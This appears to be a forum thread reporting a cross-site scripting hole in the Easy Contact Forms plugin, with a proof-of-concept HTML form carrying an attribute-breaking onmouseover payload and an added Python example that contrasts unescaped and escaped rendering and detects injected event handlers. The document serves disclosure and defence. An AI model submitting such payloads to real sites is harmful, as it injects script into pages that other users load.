• Hello. Our team has discovered an XSS vulnerability. You must escape form values to provide a fix. Here is a sample form, which can be used to reproduce the problem:

    <html>
      <body>
        <form action="https://yoursiteurl.here/contacts/" method="POST">
          <input type="hidden" name="cf-no-script" value="1" />
          <input type="hidden" name="hidden-1" value="ufo-form-id-1" />
          <input type="hidden" name="id-3324" value="1&apos; onmouseover=alert(123) bad=&apos;" />
          <input type="hidden" name="id-3326" value="1" />
          <input type="hidden" name="id-3327" value="1" />
          <input type="hidden" name="id-3330" value="1" />
          <input type="hidden" name="sid" value="e20579ba69a4faccbb3efb7ef5e0692d" />
          <input type="hidden" name="ufo-form-pagename" value="contacts" />
          <input type="hidden" name="ufo-sign" value="b4cd2c00af96cf60c2db680ffbfa72841412162299" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

Put in the appropriate field IDs. Set up one required field and leave its value attribute empty. Into another field insert the following value:

    value="1&apos; onmouseover=alert(123) bad=&apos;" />

Now you can submit the created HTML form and the alert function will run.

https://www.ads-software.com/plugins/easy-contact-forms/
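The bug class described in the post is a submitted value being re-emitted inside a quoted `value` attribute without attribute escaping, so a single quote in the input terminates the attribute and the remainder becomes new attributes. The following added example is not part of the original post and is not the plugin's own code: `render_unsafe` is a hypothetical illustration of that vulnerable pattern, `render_safe` is the fixed form using Python's `html.escape(quote=True)`, and `has_event_handler` parses the rendered markup the way a browser would so a maintainer can keep it as a regression check. The payload string is the one quoted in the post; all function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed test input, copied from the report above: the leading quote is meant
# to close the single-quoted value attribute and smuggle in an event-handler attribute.
PAYLOAD = "1' onmouseover=alert(123) bad='"


def render_unsafe(field_id: str, value: str) -> str:
    """Hypothetical vulnerable pattern (not the plugin's code): the submitted value is
    interpolated into a single-quoted attribute with no escaping at all."""
    return f"<input type='text' name='{field_id}' value='{value}' />"


def render_safe(field_id: str, value: str) -> str:
    """Same markup, but every attribute value goes through html.escape(quote=True),
    which turns ' into &#x27; (and " into &quot;) so the attribute cannot be closed early."""
    return (f"<input type='text' name='{html.escape(field_id, quote=True)}' "
            f"value='{html.escape(value, quote=True)}' />")


class InputAttrCollector(HTMLParser):
    """Records the attribute dictionary of every <input> tag, as a browser would parse it."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))

    def handle_startendtag(self, tag, attrs):
        # Self-closing <input ... /> tags arrive here; treat them like start tags.
        self.handle_starttag(tag, attrs)


def parsed_attrs(markup: str) -> dict:
    """Attributes of the first <input> in the markup (empty dict if none)."""
    parser = InputAttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.inputs[0] if parser.inputs else {}


def has_event_handler(markup: str) -> bool:
    """True if any parsed attribute name is an on* handler, i.e. the input escaped the attribute."""
    return any(name.lower().startswith("on") for name in parsed_attrs(markup))


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        markup = renderer("id-3324", PAYLOAD)
        print(f"{label}: {markup}")
        print(f"  parsed attributes: {parsed_attrs(markup)}")
        print(f"  event handler injected: {has_event_handler(markup)}")
```

In the unsafe rendering the parser sees `value='1'` followed by a separate `onmouseover=alert(123)` attribute; in the safe rendering the whole payload survives as the literal value of the attribute and no handler attribute exists. Because the post recommends escaping as the fix, the useful property to assert in a regression test is exactly that: the escaped output round-trips the raw input as a single attribute value.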

Viewing 1 replies (of 1 total)
  • The topic ‘XSS vulnerability’ is closed to new replies.